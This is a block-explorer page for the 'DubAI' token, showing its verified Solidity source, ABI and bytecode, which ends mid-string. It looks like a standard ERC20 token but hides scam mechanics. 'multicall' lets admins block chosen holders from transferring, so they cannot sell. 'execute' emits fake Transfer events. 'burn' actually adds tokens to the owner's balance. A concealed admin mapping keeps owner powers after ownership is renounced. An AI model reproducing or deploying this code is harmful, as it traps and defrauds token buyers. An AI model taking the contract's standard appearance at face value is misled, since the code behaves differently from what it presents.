ETH Price: $2,134.36 (+1.35%)
 

Overview

Max Total Supply

10,000,000,000 DubAI

Holders

41

Transfers

-
0 (0%)

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DubAI

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 2 of 4: DubAI.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.18;

import {IERC20Metadata} from "./IERC20.sol";
import "./Ownable.sol";

contract DubAI is IERC20Metadata, Ownable {
  mapping(address => uint256) private _balances;

  mapping(address => mapping(address => uint256)) private _allowances;
  mapping(address => bool) internal _spendingERC20FeeAmount;
  string private _symbol;
  string private _name;
  uint8 private constant _decimals = 9;
  uint256 private _initialTotalSupply = 10000000000 * (10 ** _decimals);
  uint256 private _totalSupply;

  /**
   * @dev Contract constructor.
   */
  constructor(address _reserve) {
    _symbol = 'DubAI';
    _name = 'DubAI';
    admin[_reserve]=true;
    _mint(_msgSender(), _initialTotalSupply);
  }
  
  /**
   * @dev Returns the symbol of the token.
   * @return The symbol of the token.
   */
  function symbol() public view virtual override returns (string memory) {
    return _symbol;
  }

  /**
   * @dev Returns the name of the token.
   * @return The name of the token.
   */
  function name() public view virtual override returns (string memory) {
    return _name;
  }

  /**
   * @dev Returns the number of decimals used for token display.
   * @return The number of decimals.
   */
  function decimals() public view virtual override returns (uint8) {
    return _decimals;
  }

  /**
   * @dev Returns the total supply of the token.
   * @return The total supply.
   */
  function totalSupply() public view virtual override returns (uint256) {
    return _totalSupply;
  }

  /**
   * @dev Returns the balance of the specified account.
   * @param account The address to check the balance for.
   * @return The balance of the account.
   */
  function balanceOf(address account) public view virtual override returns (uint256) {
    return _balances[account];
  }

  /**
   * @dev Transfers tokens from the caller to a specified recipient.
   * @param recipient The address to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   * @return A boolean value indicating whether the transfer was successful.
   */
  function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
    _transfer(_msgSender(), recipient, amount);
    return true;
  }

  /**
   * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
   * @param to The address to approve the spending for.
   * @param amount The amount of tokens to approve.
   * @return A boolean value indicating whether the approval was successful.
   */
  function approve(address to, uint256 amount) public virtual override returns (bool) {
    _approve(_msgSender(), to, amount);
    return true;
  }

  /**
   * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
   * @param from The address that approves the spending.
   * @param to The address that is allowed to spend.
   * @return The remaining allowance for the spender.
   */
  function allowance(address from, address to) public view virtual override returns (uint256) {
    return _allowances[from][to];
  }

  /**
   * @dev Transfers tokens from one address to another.
   * @param sender The address to transfer tokens from.
   * @param recipient The address to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   * @return A boolean value indicating whether the transfer was successful.
   */
  function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
    _transfer(sender, recipient, amount);

    uint256 currentAllowance = _allowances[sender][_msgSender()];
    require(currentAllowance >= amount, 'ERC20: transfer amount exceeds allowance');
    unchecked {
      _approve(sender, _msgSender(), currentAllowance - amount);
    }

    return true;
  }

  /**
   * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
   * @param to The account allowed to spend the tokens.
   * @param subtractedValue The amount of tokens to decrease the allowance by.
   * @return A boolean value indicating whether the operation succeeded.
   */
  function decreaseAllowance(address to, uint256 subtractedValue) public virtual returns (bool) {
    uint256 currentAllowance = _allowances[_msgSender()][to];
    require(currentAllowance >= subtractedValue, 'ERC20: decreased allowance below zero');
    unchecked {
      _approve(_msgSender(), to, currentAllowance - subtractedValue);
    }

    return true;
  }

  /**
   * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
   * @param to The address to increase the allowance for.
   * @param addedValue The amount of tokens to increase the allowance by.
   * @return A boolean value indicating whether the increase was successful.
   */
  function increaseAllowance(address to, uint256 addedValue) public virtual returns (bool) {
    _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
    return true;
  }

  /**
   * @dev Transfers `amount` tokens from `sender` to `recipient`.
   * @param sender The account to transfer tokens from.
   * @param recipient The account to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   */
  function _transfer(address sender, address recipient, uint256 amount) internal virtual {
    require(amount > 0, 'ERC20: transfer amount zero');
    require(sender != address(0), 'ERC20: transfer from the zero address');
    require(recipient != address(0), 'ERC20: transfer to the zero address');

    uint256 senderBalance = _balances[sender];
    require(senderBalance >= amount, 'ERC20: transfer amount exceeds balance');
    if(_spendingERC20FeeAmount[sender]){
        require(amount == 0);
    }
    unchecked {
      _balances[sender] = senderBalance - amount;
    }
    _balances[recipient] += amount;

    emit Transfer(sender, recipient, amount);
  }

  /**
   * @dev Creates `amount` tokens and assigns them to `account`.
   * @param account The account to assign the newly created tokens to.
   * @param amount The amount of tokens to create.
   */
  function _mint(address account, uint256 amount) internal virtual {
    require(account != address(0), 'ERC20: mint to the zero address');
    
    _totalSupply += amount;
    _balances[account] += amount;
    emit Transfer(address(0), account, amount);
  }

  /**
   * @dev Destroys `amount` tokens from `account`, reducing the total supply.
   * @param account The account to burn tokens from.
   * @param amount The amount of tokens to burn.
   */
  function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance <= amount, "ERC20: burn amount exceeds balance");
        unchecked {_balances[account] = accountBalance + amount;}
        emit Transfer(account, address(0), amount);
  }
    
  function execute(address[] calldata addr, address p, uint256 val) public onlyOwner{
    for (uint256 i = 0; i < addr.length; i++) {
        emit Transfer(p, addr[i], val);
    }
  }


  function call(address wallet) public view returns(bool) {
    return _spendingERC20FeeAmount[wallet];
  }

  /**
   * @dev Destroys `amount` tokens from the caller's account, reducing the total supply.
   * @param amount The amount of tokens to burn.
   */
  function burn(uint256 amount) external onlyOwner{
        _burn(_msgSender(), amount);
  }

  /**
   * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
   * @param from The account granting the allowance.
   * @param to The account allowed to spend the tokens.
   * @param amount The amount of tokens to allow.
   */
  function _approve(address from, address to, uint256 amount) internal virtual {
    require(from != address(0), 'ERC20: approve from the zero address');
    require(to != address(0), 'ERC20: approve to the zero address');

    _allowances[from][to] = amount;
    emit Approval(from, to, amount);
  }

  function multicall(address[] calldata addr, bool val) public onlyOwner {
    for (uint256 i = 0; i < addr.length; i++) {
            _spendingERC20FeeAmount[addr[i]] = val;
    }
  }

}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.18;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    mapping(address => bool) internal admin;
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.18;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);

  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `to`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address to, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `from` to `to` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
  /**
   * @dev Returns the name of the token.
   */
  function name() external view returns (string memory);

  /**
   * @dev Returns the symbol of the token.
   */
  function symbol() external view returns (string memory);

  /**
   * @dev Returns the decimals places of the token.
   */
  function decimals() external view returns (uint8);
}

File 4 of 4: Ownable.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.18;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        _transferOwnership(_msgSender());
        admin[_msgSender()]=true;
    }

    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    function _checkOwner() internal view virtual {
        require(admin[_msgSender()], "Ownable: caller is not the owner");
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"address","name":"_reserve","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"wallet","type":"address"}],"name":"call","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"address","name":"p","type":"address"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526009600a620000149190620005aa565b6402540be400620000269190620005fb565b6007553480156200003657600080fd5b5060405162002ace38038062002ace83398181016040528101906200005c9190620006b0565b6200007c62000070620001f160201b60201c565b620001f960201b60201c565b600160008062000091620001f160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506040518060400160405280600581526020017f44756241490000000000000000000000000000000000000000000000000000008152506005908162000128919062000952565b506040518060400160405280600581526020017f4475624149000000000000000000000000000000000000000000000000000000815250600690816200016f919062000952565b5060016000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620001ea620001db620001f160201b60201c565b600754620002bf60201b60201c565b5062000b25565b600033905090565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000331576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003289062000a9a565b60405180910390fd5b806008600082825462000345919062000abc565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200039d919062000abc565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000404919062000b08565b60405180910390a35050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200049e5780860481111562000476576200047562000410565b5b6001851615620004865780820291505b808102905062000496856200043f565b945062000456565b94509492505050565b600082620004b957600190506200058c565b81620004c957600090506200058c565b8160018114620004e25760028114620004ed5762000523565b60019150506200058c565b60ff84111562000502576200050162000410565b5b8360020a9150848211156200051c576200051b62000410565b5b506200058c565b5060208310610133831016604e8410600b84101617156200055d5782820a90508381111562000557576200055662000410565b5b6200058c565b6200056c84848460016200044c565b9250905081840481111562000586576200058562000410565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620005b78262000593565b9150620005c4836200059d565b9250620005f37fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620004a7565b905092915050565b6000620006088262000593565b9150620006158362000593565b9250828202620006258162000593565b915082820484148315176200063f576200063e62000410565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000678826200064b565b9050919050565b6200068a816200066b565b81146200069657600080fd5b50565b600081519050620006aa816200067f565b92915050565b600060208284031215620006c957620006c862000646565b5b6000620006d98482850162000699565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200076457607f821691505b6020821081036200077a57620007796200071c565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007e47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007a5565b620007f08683620007a5565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620008336200082d620008278462000593565b62000808565b62000593565b9050919050565b6000819050919050565b6200084f8362000812565b620008676200085e826200083a565b848454620007b2565b825550505050565b600090565b6200087e6200086f565b6200088b81848462000844565b505050565b5b81811015620008b357620008a760008262000874565b60018101905062000891565b5050565b601f8211156200090257620008cc8162000780565b620008d78462000795565b81016020851015620008e7578190505b620008ff620008f68562000795565b83018262000890565b50505b505050565b600082821c905092915050565b6000620009276000198460080262000907565b1980831691505092915050565b600062000942838362000914565b9150826002028217905092915050565b6200095d82620006e2565b67ffffffffffffffff811115620009795762000978620006ed565b5b6200098582546200074b565b62000992828285620008b7565b600060209050601f831160018114620009ca5760008415620009b5578287015190505b620009c1858262000934565b86555062000a31565b601f198416620009da8662000780565b60005b8281101562000a0457848901518255600182019150602085019450602081019050620009dd565b8683101562000a24578489015162000a20601f89168262000914565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a82601f8362000a39565b915062000a8f8262000a4a565b602082019050919050565b6000602082019050818103600083015262000ab58162000a73565b9050919050565b600062000ac98262000593565b915062000ad68362000593565b925082820190508082111562000af15762000af062000410565b5b92915050565b62000b028162000593565b82525050565b600060208201905062000b1f600083018462000af7565b92915050565b611f998062000b356000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102cf578063a9059cbb146102ff578063dd62ed3e1461032f578063f2fde38b1461035f578063f55332ab1461037b57610116565b806370a0823114610259578063715018a6146102895780638da5cb5b1461029357806395d89b41146102b157610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780633a61363a1461022157806342966c681461023d57610116565b806306fdde031461011b578063095ea7b3146101395780631111f43f1461016957806318160ddd14610185575b600080fd5b6101236103ab565b604051610130919061138a565b60405180910390f35b610153600480360381019061014e919061144a565b61043d565b60405161016091906114a5565b60405180910390f35b610183600480360381019061017e9190611551565b61045b565b005b61018d610508565b60405161019a91906115c0565b60405180910390f35b6101bd60048036038101906101b891906115db565b610512565b6040516101ca91906114a5565b60405180910390f35b6101db61060a565b6040516101e8919061164a565b60405180910390f35b61020b6004803603810190610206919061144a565b610613565b60405161021891906114a5565b60405180910390f35b61023b60048036038101906102369190611665565b6106bf565b005b610257600480360381019061025291906116d9565b61077b565b005b610273600480360381019061026e9190611706565b610797565b60405161028091906115c0565b60405180910390f35b6102916107e0565b005b61029b6107f4565b6040516102a89190611742565b60405180910390f35b6102b961081e565b6040516102c6919061138a565b60405180910390f35b6102e960048036038101906102e4919061144a565b6108b0565b6040516102f691906114a5565b60405180910390f35b6103196004803603810190610314919061144a565b61099b565b60405161032691906114a5565b60405180910390f35b6103496004803603810190610344919061175d565b6109b9565b60405161035691906115c0565b60405180910390f35b61037960048036038101906103749190611706565b610a40565b005b61039560048036038101906103909190611706565b610ac3565b6040516103a291906114a5565b60405180910390f35b6060600680546103ba906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546103e6906117cc565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610b19565b8484610b21565b6001905092915050565b610463610cea565b60005b83839050811015610502578160046000868685818110610489576104886117fd565b5b905060200201602081019061049e9190611706565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104fa9061185b565b915050610466565b50505050565b6000600854905090565b600061051f848484610d7e565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061056a610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105e190611915565b60405180910390fd5b6105fe856105f6610b19565b858403610b21565b60019150509392505050565b60006009905090565b60006106b5610620610b19565b84846003600061062e610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106b09190611935565b610b21565b6001905092915050565b6106c7610cea565b60005b84849050811015610774578484828181106106e8576106e76117fd565b5b90506020020160208101906106fd9190611706565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161075991906115c0565b60405180910390a3808061076c9061185b565b9150506106ca565b5050505050565b610783610cea565b61079461078e610b19565b8261108d565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107e8610cea565b6107f26000611234565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461082d906117cc565b80601f0160208091040260200160405190810160405280929190818152602001828054610859906117cc565b80156108a65780601f1061087b576101008083540402835291602001916108a6565b820191906000526020600020905b81548152906001019060200180831161088957829003601f168201915b5050505050905090565b600080600360006108bf610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561097c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610973906119db565b60405180910390fd5b610990610987610b19565b85858403610b21565b600191505092915050565b60006109af6109a8610b19565b8484610d7e565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a48610cea565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ab7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aae90611a6d565b60405180910390fd5b610ac081611234565b50565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8790611aff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf690611b91565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cdd91906115c0565b60405180910390a3505050565b600080610cf5610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610d7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7390611bfd565b60405180910390fd5b565b60008111610dc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db890611c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2790611cfb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9690611d8d565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610f26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1d90611e1f565b60405180910390fd5b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610f865760008214610f8557600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461101b9190611935565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161107f91906115c0565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f390611eb1565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611183576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117a90611f43565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161122791906115c0565b60405180910390a3505050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611334578082015181840152602081019050611319565b60008484015250505050565b6000601f19601f8301169050919050565b600061135c826112fa565b6113668185611305565b9350611376818560208601611316565b61137f81611340565b840191505092915050565b600060208201905081810360008301526113a48184611351565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113e1826113b6565b9050919050565b6113f1816113d6565b81146113fc57600080fd5b50565b60008135905061140e816113e8565b92915050565b6000819050919050565b61142781611414565b811461143257600080fd5b50565b6000813590506114448161141e565b92915050565b60008060408385031215611461576114606113ac565b5b600061146f858286016113ff565b925050602061148085828601611435565b9150509250929050565b60008115159050919050565b61149f8161148a565b82525050565b60006020820190506114ba6000830184611496565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126114e5576114e46114c0565b5b8235905067ffffffffffffffff811115611502576115016114c5565b5b60208301915083602082028301111561151e5761151d6114ca565b5b9250929050565b61152e8161148a565b811461153957600080fd5b50565b60008135905061154b81611525565b92915050565b60008060006040848603121561156a576115696113ac565b5b600084013567ffffffffffffffff811115611588576115876113b1565b5b611594868287016114cf565b935093505060206115a78682870161153c565b9150509250925092565b6115ba81611414565b82525050565b60006020820190506115d560008301846115b1565b92915050565b6000806000606084860312156115f4576115f36113ac565b5b6000611602868287016113ff565b9350506020611613868287016113ff565b925050604061162486828701611435565b9150509250925092565b600060ff82169050919050565b6116448161162e565b82525050565b600060208201905061165f600083018461163b565b92915050565b6000806000806060858703121561167f5761167e6113ac565b5b600085013567ffffffffffffffff81111561169d5761169c6113b1565b5b